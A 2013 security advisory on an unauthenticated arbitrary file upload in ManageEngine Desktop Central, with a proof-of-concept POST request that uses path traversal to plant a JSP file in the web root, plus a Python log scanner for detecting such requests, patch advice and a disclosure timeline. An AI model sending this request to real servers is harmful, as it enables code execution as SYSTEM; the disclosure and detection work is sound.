"ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload"

Author: Security-Assessment.com
Platform: jsp
Release date: 2013-11-18

(    , )     (, 
  .   `.' ) ('.    ', 
   ). , ('.   ( ) ( 
  (_,) .`), ) _ _, 
 /  _____/  / _  \    ____  ____   _____ 
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \ 
 /       \/   |    \\  \__(  <_> )  Y Y  \ 
/______  /\___|__  / \___  >____/|__|_|  / 
        \/         \/.-.    \/         \/:wq 
                    (x.0) 
                  '=.|w|.=' 
                  _='`"``=. 

                presents.. 

DesktopCentral Arbitrary File Upload Vulnerability
Affected versions: DesktopCentral versions < 80293

PDF: http://security-assessment.com/files/documents/advisory/DesktopCentral%20Arbitrary%20File%20Upload.pdf

+-----------+ 
|Description| 
+-----------+ 

ManageEngine DesktopCentral 8.0.0 build 80293 and below suffer from an arbitrary file upload vulnerability that can be
leveraged to gain arbitrary code execution on the server. Code run on the server in this fashion executes as
NT AUTHORITY\SYSTEM.
The problem exists in the AgentLogUploadServlet. This servlet takes input from an HTTP POST request and constructs an
output file on the server without sanitising that input or even checking whether the caller is authenticated. Because
of the way the path is constructed, it is possible to traverse to the application web root and create a script file
that will be executed when requested from a web browser.

+------------+ 
|Exploitation| 
+------------+ 

POST /agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=test.jsp HTTP/1.1
Host: <desktopcentral>:8020
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: keep-alive
Content-Type: text/html;
Content-Length: 109

<HTML>
 <HEAD>
  <TITLE>Hello World</TITLE>
 </HEAD>
 <BODY>
  <H1>Hello World</H1>
 </BODY>
</HTML>

+----------+ 
| Solution | 
+----------+ 

Apply the patch supplied by the vendor (Patch 80293)
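
For servers that were reachable before the patch was applied, the web access logs can be reviewed for requests shaped
like the one above. The following is an added example, not part of the original advisory or the vendor's code: it
flags POSTs to /agentLogUploader whose parameters carry path traversal or a script file name. The log layout
(combined-log-style request field), the extension list and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query parameters used in the advisory's request.
PARAMS = ("computerName", "domainName", "customerId", "filename")
SCRIPT_EXT = (".jsp", ".jspx", ".war")  # assumed list of executable uploads
# Assumed log layout: the request is logged as "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_line(line):
    """Return the reasons a log line looks like abuse of the upload servlet."""
    m = REQUEST_RE.search(line)
    if not m or m.group("method") != "POST":
        return []
    url = urlsplit(m.group("target"))
    if url.path.rstrip("/").lower() != "/agentloguploader":
        return []
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    reasons = []
    for name in PARAMS:
        for value in query.get(name, []):
            segments = re.split(r"[\\/]", value)
            if ".." in segments:
                reasons.append(f"{name}: parent-directory segment")
            elif len(segments) > 1:
                reasons.append(f"{name}: path separator")
            if name == "filename" and value.lower().endswith(SCRIPT_EXT):
                reasons.append(f"{name}: server-side script extension")
    return reasons


def scan(lines):
    """Return (line_number, reasons) for every suspicious line."""
    hits = ((n, inspect_line(text)) for n, text in enumerate(lines, 1))
    return [(n, reasons) for n, reasons in hits if reasons]


# Constructed sample lines (not real logs); addresses are documentation ranges.
SAMPLE = [
    '192.0.2.10 - - [18/Nov/2013:10:00:00 +0000] "POST /agentLogUploader?computerName=PC01&domainName=CORP&customerId=1&filename=agent.log HTTP/1.1" 200 0',
    '198.51.100.7 - - [18/Nov/2013:10:05:00 +0000] "POST /agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=test.jsp HTTP/1.1" 200 0',
    '198.51.100.7 - - [18/Nov/2013:10:06:00 +0000] "POST /agentLogUploader?computerName=PC01&domainName=CORP&customerId=%2e%2e%5c1&filename=a.log HTTP/1.1" 200 0',
    '192.0.2.10 - - [18/Nov/2013:10:07:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE):
        print(number, "; ".join(reasons))
```

A hit only shows that a matching request was received; any flagged file name should then be checked for under the
application web root.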

+-------------------+ 
|Disclosure Timeline| 
+-------------------+ 


20/10/2013  Vulnerability discovered, vendor notified.
25/10/2013  Vendor acknowledges issue
30/10/2013  Vendor issues Patch 80293 that fixes the issue
09/11/2013  Exploit demonstrated at Kiwicon 7
18/11/2013  Advisory released.

+-----------------------------+ 
|About Security-Assessment.com| 
+-----------------------------+ 

Security-Assessment.com is a New Zealand based world 
leader in web application testing, network security 
and penetration testing. Security-Assessment.com 
services organisations across New Zealand, Australia, 
Asia Pacific, the United States and the United 
Kingdom. 

Security-Assessment.com is currently looking for skilled penetration 
testers. If you are interested, please email 'hr at security-assessment.com'